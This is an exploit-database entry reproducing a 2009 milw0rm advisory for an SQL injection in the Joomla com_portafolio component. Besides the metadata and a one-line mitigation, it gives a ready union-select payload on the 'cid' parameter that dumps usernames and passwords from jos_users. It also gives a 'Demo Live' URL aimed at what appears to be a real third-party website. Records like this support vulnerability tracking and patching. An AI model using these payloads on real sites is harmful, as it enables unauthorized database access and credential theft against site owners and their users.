Joomla Component com_portafolio (cid) SQL injection Vulnerability

vendor:

com_portafolio

by:

Chip D3 Bi0s

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: com_portafolio

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_portafolio (cid) SQL injection Vulnerability

An SQL injection vulnerability exists in the Joomla Component com_portafolio (cid) which allows an attacker to execute arbitrary SQL commands via the 'cid' parameter in a 'viewcat' action to index.php. An attacker can exploit this vulnerability to gain access to the database and execute malicious code.

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

----------------------------------------------------------------------
Joomla Component com_portafolio (cid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_portafolio&task=viewcat&cid=<sql Code>

 <Sql Code>:
 -null+union+select+1,2,3,4,5,6,7,concat(username,0x3a,password),9+jos_users--&Itemid=5
 

Demo Live:
	
In this example, you took the time to rename the table:jos_users
which is normally using joomla

http://www.garboweb.com/index.php?option=com_portafolio&task=viewcat&cid=-null+and+1=2+union+select+1,2,3,4,5,6,7,user(),9--&Itemid=5


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------

# milw0rm.com [2009-06-08]